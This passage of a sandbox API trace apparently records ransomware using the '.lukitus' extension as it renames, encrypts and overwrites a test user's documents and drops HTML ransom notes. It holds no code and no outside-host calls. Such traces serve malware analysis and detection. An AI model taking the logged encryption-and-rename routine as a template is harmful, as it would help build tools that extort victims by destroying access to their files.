[0106.417] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x63733430, dwHighDateTime=0x1d31760)) [0106.417] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.417] FlushFileBuffers (hFile=0x328) returned 1 [0106.420] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.420] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.420] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.420] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.420] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\lukitus-2446.htm" (normalized: "c:\\users\\aetadzjz\\documents\\lukitus-2446.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.421] DeviceIoControl (in: hDevice=0x328, dwIoControlCode=0x9c040, lpInBuffer=0x281fca4*, nInBufferSize=0x2, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x281fc98, lpOverlapped=0x0 | out: lpInBuffer=0x281fca4*, lpOutBuffer=0x0*, lpBytesReturned=0x281fc98*=0x0, lpOverlapped=0x0) returned 1 [0106.421] WriteFile (in: hFile=0x328, lpBuffer=0x28a0048*, nNumberOfBytesToWrite=0x22aa, lpNumberOfBytesWritten=0x281fc8c, lpOverlapped=0x0 | out: lpBuffer=0x28a0048*, lpNumberOfBytesWritten=0x281fc8c*=0x22aa, lpOverlapped=0x0) returned 1 [0106.422] CloseHandle (hObject=0x328) returned 1 [0106.422] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\ZgsodtON.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\zgsodton.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x632a6d80, ftCreationTime.dwHighDateTime=0x1d304ab, ftLastAccessTime.dwLowDateTime=0xdf2b1250, ftLastAccessTime.dwHighDateTime=0x1d2f91f, ftLastWriteTime.dwLowDateTime=0xdf2b1250, ftLastWriteTime.dwHighDateTime=0x1d2f91f, nFileSizeHigh=0x0, nFileSizeLow=0x446a)) returned 1 [0106.422] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.422] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.423] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.423] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\ZgsodtON.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\zgsodton.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.423] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\ZgsodtON.xlsx" (normalized: "c:\\users\\aetadzjz\\documents\\zgsodton.xlsx"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\F56924BE-9663-41BB-1FC77E46-75D0D332D675.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\f56924be-9663-41bb-1fc77e46-75d0d332d675.lukitus"), dwFlags=0x9) returned 1 [0106.431] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.431] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.438] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x446a, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x446a, lpOverlapped=0x0) returned 1 [0106.438] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.438] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x446a, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x446a, lpOverlapped=0x0) returned 1 [0106.438] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.439] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x6377f6f0, dwHighDateTime=0x1d31760)) [0106.439] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.439] FlushFileBuffers (hFile=0x328) returned 1 [0106.442] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\uv7fKGVoQ2Jb7.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\uv7fkgvoq2jb7.xls"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f152320, ftCreationTime.dwHighDateTime=0x1d2f6df, ftLastAccessTime.dwLowDateTime=0xb94f9970, ftLastAccessTime.dwHighDateTime=0x1d2feab, ftLastWriteTime.dwLowDateTime=0xb94f9970, ftLastWriteTime.dwHighDateTime=0x1d2feab, nFileSizeHigh=0x0, nFileSizeLow=0x7362)) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.442] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.443] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.443] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.443] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.443] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.443] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.443] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.443] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\uv7fKGVoQ2Jb7.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\uv7fkgvoq2jb7.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.443] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\uv7fKGVoQ2Jb7.xls" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\uv7fkgvoq2jb7.xls"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-F71E2D7C-1A58C58CDE47.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-f71e2d7c-1a58c58cde47.lukitus"), dwFlags=0x9) returned 1 [0106.445] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.445] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.451] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x7362, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x7362, lpOverlapped=0x0) returned 1 [0106.451] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.451] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x7362, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x7362, lpOverlapped=0x0) returned 1 [0106.452] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.452] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x637a5850, dwHighDateTime=0x1d31760)) [0106.452] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.452] FlushFileBuffers (hFile=0x328) returned 1 [0106.455] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.455] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.455] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.455] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281fcc0 | out: pbBuffer=0x281fcc0) returned 1 [0106.455] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\lukitus-547b.htm" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\lukitus-547b.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.455] DeviceIoControl (in: hDevice=0x328, dwIoControlCode=0x9c040, lpInBuffer=0x281fca4*, nInBufferSize=0x2, lpOutBuffer=0x0, nOutBufferSize=0x0, lpBytesReturned=0x281fc98, lpOverlapped=0x0 | out: lpInBuffer=0x281fca4*, lpOutBuffer=0x0*, lpBytesReturned=0x281fc98*=0x0, lpOverlapped=0x0) returned 1 [0106.456] WriteFile (in: hFile=0x328, lpBuffer=0x28a0048*, nNumberOfBytesToWrite=0x22aa, lpNumberOfBytesWritten=0x281fc8c, lpOverlapped=0x0 | out: lpBuffer=0x28a0048*, lpNumberOfBytesWritten=0x281fc8c*=0x22aa, lpOverlapped=0x0) returned 1 [0106.456] CloseHandle (hObject=0x328) returned 1 [0106.457] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\_BYbdV.ods" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\_bybdv.ods"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x30cfeee0, ftCreationTime.dwHighDateTime=0x1d2f9c6, ftLastAccessTime.dwLowDateTime=0x849bf80, ftLastAccessTime.dwHighDateTime=0x1d30580, ftLastWriteTime.dwLowDateTime=0x849bf80, ftLastWriteTime.dwHighDateTime=0x1d30580, nFileSizeHigh=0x0, nFileSizeLow=0x110a6)) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.457] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.457] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\_BYbdV.ods" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\_bybdv.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.457] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\_BYbdV.ods" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\_bybdv.ods"), lpNewFileName="c:\\Users\\aETAdzjz\\Documents\\Fwkh\\F56924BE-9663-41BB-68C82DF1-14B4D804BD61.lukitus" (normalized: "c:\\users\\aetadzjz\\documents\\fwkh\\f56924be-9663-41bb-68c82df1-14b4d804bd61.lukitus"), dwFlags=0x9) returned 1 [0106.459] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.459] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.465] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0x110a6, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0x110a6, lpOverlapped=0x0) returned 1 [0106.465] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.466] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0x110a6, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesWritten=0x281f598*=0x110a6, lpOverlapped=0x0) returned 1 [0106.466] WriteFile (in: hFile=0x328, lpBuffer=0x281f6c8*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x281f6c8*, lpNumberOfBytesWritten=0x281f598*=0x344, lpOverlapped=0x0) returned 1 [0106.466] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x281fc94 | out: lpSystemTimeAsFileTime=0x281fc94*(dwLowDateTime=0x637a5850, dwHighDateTime=0x1d31760)) [0106.466] SetFileTime (hFile=0x328, lpCreationTime=0x281fc94, lpLastAccessTime=0x281fc94, lpLastWriteTime=0x281fc94) returned 1 [0106.466] FlushFileBuffers (hFile=0x328) returned 1 [0106.474] GetFileAttributesExW (in: lpFileName="c:\\Users\\aETAdzjz\\Desktop\\~$098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\~$098073.doc"), fInfoLevelId=0x0, lpFileInformation=0x281f9e8 | out: lpFileInformation=0x281f9e8*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x358db130, ftCreationTime.dwHighDateTime=0x1d31760, ftLastAccessTime.dwLowDateTime=0x358db130, ftLastAccessTime.dwHighDateTime=0x1d31760, ftLastWriteTime.dwLowDateTime=0x358db130, ftLastWriteTime.dwHighDateTime=0x1d31760, nFileSizeHigh=0x0, nFileSizeLow=0xa2)) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] CryptGenRandom (in: hProv=0x606b98, dwLen=0x4, pbBuffer=0x281f594 | out: pbBuffer=0x281f594) returned 1 [0106.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe74, cbMultiByte=4, lpWideCharStr=0x281f558, cchWideChar=4 | out: lpWideCharStr="41BB") returned 4 [0106.474] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x281fe70, cbMultiByte=4, lpWideCharStr=0x281f548, cchWideChar=4 | out: lpWideCharStr="9663") returned 4 [0106.474] CreateFileW (lpFileName="c:\\Users\\aETAdzjz\\Desktop\\~$098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\~$098073.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x328 [0106.474] MoveFileExW (lpExistingFileName="c:\\Users\\aETAdzjz\\Desktop\\~$098073.doc" (normalized: "c:\\users\\aetadzjz\\desktop\\~$098073.doc"), lpNewFileName="c:\\Users\\aETAdzjz\\Desktop\\F56924BE-9663-41BB-49CF61EE-57465675BB4A.lukitus" (normalized: "c:\\users\\aetadzjz\\desktop\\f56924be-9663-41bb-49cf61ee-57465675bb4a.lukitus"), dwFlags=0x9) returned 1 [0106.476] CryptGenRandom (in: hProv=0x606b98, dwLen=0x10, pbBuffer=0x281f6dc | out: pbBuffer=0x281f6dc) returned 1 [0106.476] CryptEncrypt (in: hKey=0x5fc258, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x10, dwBufLen=0x100 | out: pbData=0x281f6dc*, pdwDataLen=0x281f58c*=0x100) returned 1 [0106.483] ReadFile (in: hFile=0x328, lpBuffer=0x2da0020, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x281f598, lpOverlapped=0x0 | out: lpBuffer=0x2da0020*, lpNumberOfBytesRead=0x281f598*=0xa2, lpOverlapped=0x0) returned 1 [0106.483] SetFilePointer (in: hFile=0x328, lDistanceToMove=0, lpDistanceToMoveHigh=0x281f584*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x281f584*=0) returned 0x0 [0106.483] WriteFile (in: hFile=0x328, lpBuffer=0x2da0020*, nNumberOfBytesToWrite=0xa2, 